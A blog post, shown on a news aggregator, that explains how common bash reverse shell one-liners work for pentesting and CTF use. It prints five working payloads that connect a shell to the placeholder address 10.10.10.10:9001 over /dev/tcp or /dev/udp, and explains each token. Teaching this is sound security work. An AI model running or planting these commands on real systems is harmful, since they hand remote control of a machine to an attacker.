惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Hacker News: Ask HN
Hacker News: Ask HN
WordPress大学
WordPress大学
GbyAI
GbyAI
T
Tailwind CSS Blog
Know Your Adversary
Know Your Adversary
小众软件
小众软件
Security Latest
Security Latest
博客园 - 聂微东
P
Privacy International News Feed
L
Lohrmann on Cybersecurity
爱范儿
爱范儿
云风的 BLOG
云风的 BLOG
阮一峰的网络日志
阮一峰的网络日志
C
Cyber Attacks, Cyber Crime and Cyber Security
博客园 - 叶小钗
Last Week in AI
Last Week in AI
The Register - Security
The Register - Security
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
V
Vulnerabilities – Threatpost
Jina AI
Jina AI
AWS News Blog
AWS News Blog
L
LINUX DO - 热门话题
D
Darknet – Hacking Tools, Hacker News & Cyber Security
NISL@THU
NISL@THU
Spread Privacy
Spread Privacy
Google DeepMind News
Google DeepMind News
P
Palo Alto Networks Blog
S
Schneier on Security
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
T
The Exploit Database - CXSecurity.com
月光博客
月光博客
C
CERT Recently Published Vulnerability Notes
G
GRAHAM CLULEY
N
Netflix TechBlog - Medium
量子位
K
Kaspersky official blog
T
Threatpost
Latest news
Latest news
The Cloudflare Blog
MyScale Blog
MyScale Blog
C
Cisco Blogs
T
Tor Project blog
S
Securelist
Cisco Talos Blog
Cisco Talos Blog
The GitHub Blog
The GitHub Blog
A
Arctic Wolf
T
Threat Research - Cisco Blogs
H
Help Net Security
C
CXSECURITY Database RSS Feed - CXSecurity.com

Homepage on Aditya Telange

One Year with evil-winrm-py - A Retrospective Bypassing LinkedIn's Connection Privacy with a Simple Search Filter Making Dynamic Instrumentation Accessible with Frida UI Breaking Payload Encryption in Web Applications HackTheBox (HTB) - Escape HackTheBox (HTB) - Resolute HackTheBox (HTB) - Certified State of VMWare Workstation (Pro?) on Linux Android App Security Testing Lab with MobSleuth Android phone as a Webcam on Linux HackTheBox (HTB) - Photobomb Merging AOSP Security Patches into Custom ROMs Primer on HTTP Security Headers Image Zoom-In effect with HUGO HackTheBox (HTB) - Legacy HackTheBox (HTB) - Lame Cryptohack - Keyed Permutations [5 pts] Cryptohack - Resisting Bruteforce [10 pts] Cryptohack - RSA Starter 1 [10 pts] Cryptohack - Base64 [10 pts] Cryptohack - Bytes and Big Integers [10 pts] Cryptohack - Hex [5 pts] Cryptohack- XOR Starter [10 pts] HackTheBox (HTB) - Horizontall HackTheBox (HTB) - Forge HackTheBox (HTB) - Previse HackTheBox (HTB) - BountyHunter HackTheBox (HTB) - Explore HackTheBox (HTB) - Cap HackTheBox (HTB) - Pit HackTheBox (HTB) - Knife HackTheBox (HTB) - Love HackTheBox (HTB) - Tenet HackTheBox (HTB) - Ready Watermarking images with HUGO My Github Project went viral! Cryptohack - ASCII [5 pts] Cryptohack - Finding Flags [2 pts] Cryptohack - Great Snakes [3 pts] Cryptohack - JWT Sessions [10 pts] Cryptohack - Network Attacks [5 pts] Cryptohack - Token Appreciation [5 pts] CAF's Android for MSM Basic Website Analytics with Vercel Github Actions as Temporary File Sharing Platform Addition of prebuilt APK - AOSP Rom Development External Link With target='_blank' in Hugo Markdown Setting Up Build Environment - AOSP Rom Development Getting Started - AOSP Rom Development Using Secure HTTP Headers with Vercel/Zeit Education and Certifications Link Tree ↟ | Aditya Telange Personal Projects Resume - Aditya Telange Security Acknowledgements About Me Graph View License Privacy Policy
Breaking down Reverse shell commands
[Aditya Telange](https://x.com/adityatelange) · 2023-05-07 · via Homepage on Aditya Telange

In pentesting assessments and CTFs we always need reverse shells to execute commands on target machine once we have exploited a system and have a command injection at some point in our engagement.

For that we have an awesome project: revshells.com or reverse-shell-generator where we have a ton of reverse shell payloads listed. This blog post tries to explain their working.

Note: I’ll be breaking down all of them, but not all at once. If you have any comments/feedback let me know in the comments section.

What are reverse shells 🐚?

A reverse shell is a shell where commands are executed on a remote machine but the input and output of these shell commands are redirected to/from a remotely connected device.

With a reverse shell, the target machine initiates the connection and connects back to our machine.

This allows us to run commands on the remote machine without directly having access to its shell. This process is also popularly known as shell shoveling.

The basics 🌱

On any system we usually have 3 file descriptors (referred as FD here after):

  • 0 - STDIN :: Standard Input
  • 1 - STDOUT :: Standard Output
  • 2 - STDERR :: Standard Error

A file descriptor is the Unix abstraction for an open input/output stream: a file, a network connection, a pipe (a communication channel between processes), a terminal, etc. 1

Apart from the default FDs we can set out own FDs as well. We’ll see how these are used in examples down below.

Bash -i

sh -i >& /dev/tcp/10.10.10.10/9001 0>&1
  • sh is our shell interpreter. This could be any 1 from the many available on linux machines, ex bash, dash, ash, csh, ksh. sh is usually used as it is a symbolic link to one of available shell binaries.
  • -i forces the shell to be interactive.
  • >& is used to redirect the standard output (STDOUT) and standard error (STDERR) streams to another FD or device, in this case output and errors from sh command are redirected to TCP connection.
  • /dev/tcp/10.10.10.10/9001 when executing a command on a /dev/tcp/[host]/[port] pseudo-device file, bash opens a TCP connection to the associated socket. 2
  • 0>&1 redirects the standard input (STDIN) stream to the same place as the standard output (STDOUT) stream, effectively merging both streams into a single bidirectional stream.

Bash 196

0<&196;exec 196<>/dev/tcp/10.10.10.10/9001; sh <&196 >&196 2>&196

In this we have 3 sub commands seperated by ;. This runs one command after another has finished, irrespective of the outcome of the first.

  • 0<&196; redirects the STDIN (0) to FD3 196. (196 is a randomly chosen number.)
  • exec 196<>/dev/tcp/10.10.10.10/9001;
    • exec is a built-in command which used to execute a command and replace the current shell process with the new command.
    • 196 is the FD we chose earlier.
    • <> is used to create a read-write4 FD.
    • /dev/tcp/10.10.10.10/9001 mentions the TCP connection connected to host 10.10.10.10 and port 9001.
  • sh <&196 >&196 2>&196 is used to redirect the STDIN, STDOUT, and STDERR streams of the shell (sh) to FD 196.
    • <&196 says any input to sh will be from 196 FD.
    • >&196 says any output from sh will go to 196 FD.
    • 2>&196 says any error from sh will go to 196 FD.

Bash read line

exec 5<>/dev/tcp/10.10.10.10/9001;cat <&5 | while read line; do $line 2>&5 >&5; done
  • exec 5<>/dev/tcp/10.10.10.10/9001
    • exec is a built-in command which used to execute a command and replace the current shell process with the new command.
    • 5 is the FD.(5 is a randomly chosen number.)
    • <> is used to create a read-write4 FD.
    • /dev/tcp/10.10.10.10/9001 mentions the TCP connection connected to host 10.10.10.10 and port 9001.
  • cat <&5 reads input from FD 5.
  • | sends output of preceding command as input of subsequent command.
  • while read line; do $line 2>&5 >&5; done
    • while read line reads the text received from cat line by line and stores text in current line in line variable.
    • do $line executes the text in each line as a command.
    • 2>&5 >&5 redirects the STDERR and STDOUT from commands output to FD 5. (i.e sending it to established TCP connection).

Bash 5

sh -i 5<> /dev/tcp/10.10.10.10/9001 0<&5 1>&5 2>&5
  • sh is our shell interpreter.
  • -i forces the shell to be interactive
  • 5 is the FD.(5 is a randomly chosen number.)
  • <> is used to create a read-write4 FD.
  • /dev/tcp/10.10.10.10/9001 mentions the TCP connection connected to host 10.10.10.10 and port 9001.
  • 0<&5 1>&5 2>&5
    • 0<&5 says any input to sh will be from 5 FD.
    • 1>&5 says any output from sh will go to 5 FD.
    • 2>&5 says any error from sh will go to 5 FD.

Bash udp

sh -i >& /dev/udp/10.10.10.10/9001 0>&1
  • sh is our shell interpreter. This could be any 1 from the many available on linux machines, ex bash, dash, ash, csh, ksh. sh is usually used as it is a symbolic link to one of available shell binaries.
  • -i forces the shell to be interactive
  • >& is used to redirect the standard output (STDOUT) and standard error (STDERR) streams to another FD or device, in this case output and errors from sh command are redirected to TCP connection.
  • /dev/udp/10.10.10.10/9001 When executing a command on a /dev/udp/[host]/[port] pseudo-device file, Bash opens a UDP connection to the associated socket. 2
  • 0>&1 redirects the standard input (STDIN) stream to the same place as the standard output (STDOUT) stream, effectively merging both streams into a single bidirectional stream.